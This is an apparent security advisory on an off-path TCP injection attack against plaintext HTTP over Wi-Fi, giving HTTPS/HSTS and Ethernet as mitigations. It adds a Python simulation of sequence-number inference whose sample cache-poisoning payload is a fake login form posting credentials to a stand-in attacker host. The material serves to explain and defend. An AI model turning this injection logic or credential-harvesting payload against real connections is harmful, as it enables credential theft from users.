Off-Path TCP Exploit Allows Attackers To Steal Data Via Unencrypted Connections
(Sep 21, 2018)
Associate Professor Zhiyun Qian and doctoral student Weiteng Chen of the University of California, Riverside, disclosed an off-path TCP exploit that affects unencrypted (plaintext HTTP) connections carried over Wi-Fi. The attacker does not sit on the path and never sees the victim's traffic; instead, it sends spoofed TCP segments to the victim and uses a timing side channel, which arises because Wi-Fi is half-duplex, to learn whether the victim reacted to each guess. That yes/no signal is enough to infer the connection's TCP sequence numbers, after which the attacker can inject a payload that the victim's TCP stack accepts as legitimate data. The researchers use this to poison the browser's web cache with a malicious copy of a page (typically a login or checkout page the user visits), so that every later visit to that page serves the tampered version, exposing any credentials or other information entered into it. Because the weakness lies in how TCP and Wi-Fi interact rather than in any single implementation, macOS, Windows and Linux clients are all affected, and no patch had been released at the time of writing.
Recommendation: Since no patch is available for this weakness, browse only sites served over HTTPS, preferably ones that set HTTP Strict Transport Security (HSTS) so the browser never falls back to plaintext HTTP; injected bytes on a TLS connection fail authentication and tear the session down instead of replacing the page. Connecting over an Ethernet cable instead of Wi-Fi is another mitigation, because the side channel is specific to Wi-Fi. Note that this refers to the encryption of the application connection (TLS), not of the wireless link: the attack works against plaintext HTTP regardless of the Wi-Fi network's own security settings, so ensure you are consistently on an encrypted connection.
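As an added illustration (this is a simulation written for this note, not code from the paper or from the report above), the following Python model shows the core of an off-path TCP injection as described: the attacker cannot see the connection, but obtains a yes/no answer to "did the victim react to a spoofed segment with this sequence number?". In the real attack that answer comes from the Wi-Fi timing side channel; here it is supplied directly by a toy receiver. The connection's 4-tuple, a 64 KiB receive window and the injected payload are assumptions for the demonstration; the rate limits and port inference a real attack must deal with are abstracted away.

```python
"""Simulated off-path TCP sequence-number inference followed by data injection.

Added example, not code from the paper or the report.  The attacker never sees
the victim's traffic; it only learns whether the victim reacted to a spoofed
segment (in the real attack, via a Wi-Fi timing side channel).
"""
import random

SEQ_SPACE = 2 ** 32
DEFAULT_WINDOW = 65_535  # assumed advertised receive window (attacker's guess)


class VictimConnection:
    """Toy TCP receiver tracking rcv_nxt and the receive window."""

    def __init__(self, rcv_nxt, rcv_wnd=DEFAULT_WINDOW):
        self.rcv_nxt = rcv_nxt % SEQ_SPACE
        self.rcv_wnd = rcv_wnd
        self.received = b""
        self.probes = 0  # how many side-channel observations the attacker needed

    def reacts_to(self, seq):
        """Side-channel oracle: True iff seq lies in [rcv_nxt, rcv_nxt + rcv_wnd),
        computed modulo 2^32 (the RFC 793 acceptance test for an empty segment)."""
        self.probes += 1
        return (seq - self.rcv_nxt) % SEQ_SPACE < self.rcv_wnd

    def deliver(self, seq, data):
        """Accept a data segment only if it starts exactly at rcv_nxt
        (simplified: no reassembly of out-of-order in-window data)."""
        if seq % SEQ_SPACE != self.rcv_nxt:
            return False
        self.received += data
        self.rcv_nxt = (self.rcv_nxt + len(data)) % SEQ_SPACE
        return True


def infer_rcv_nxt(oracle, wnd=DEFAULT_WINDOW):
    """Recover the exact rcv_nxt with about 2^32 / wnd + log2(wnd) oracle queries.

    Phase 1 strides through the 32-bit space in steps of the assumed window, so
    some guess must land inside a window of at least that size.  Phase 2 steps
    back one window at a time until a guess is out of window, then bisects to
    find the left edge of the window, which is rcv_nxt.
    """
    hit = next((g for g in range(0, SEQ_SPACE, wnd) if oracle(g)), None)
    if hit is None:
        raise RuntimeError("real window smaller than assumed; no in-window hit")
    hi = hit                          # known in window
    lo = (hit - wnd) % SEQ_SPACE      # usually out of window already
    while oracle(lo):                 # real window larger than assumed: keep stepping back
        hi, lo = lo, (lo - wnd) % SEQ_SPACE
    while (hi - lo) % SEQ_SPACE > 1:  # invariant: lo out of window, hi in window
        mid = (lo + ((hi - lo) % SEQ_SPACE) // 2) % SEQ_SPACE
        if oracle(mid):
            hi = mid
        else:
            lo = mid
    return hi


def inject(victim, payload):
    """Full chain: infer the sequence number, then spoof one in-order segment."""
    seq = infer_rcv_nxt(victim.reacts_to)
    return victim.deliver(seq, payload)


# Constructed payload standing in for a poisoned, long-lived copy of a login page.
FAKE_RESPONSE = (b"HTTP/1.1 200 OK\r\nCache-Control: max-age=31536000\r\n\r\n"
                 b"<form action=\"http://attacker.invalid/\">...</form>")

if __name__ == "__main__":
    victim = VictimConnection(random.getrandbits(32))
    accepted = inject(victim, FAKE_RESPONSE)
    print(f"accepted={accepted} probes={victim.probes}")
```

The point of the simulation is the probe budget: a 32-bit sequence space sounds unguessable, but a 64 KiB window turns it into roughly 65,000 coarse probes plus a 16-step binary search, which is practical whenever each probe yields one bit. It also shows why TLS is the fix rather than a deterrent: the victim's TCP layer still accepts the spoofed segment, but under TLS the injected bytes fail record authentication and the session is torn down, so no tampered page ever reaches the cache.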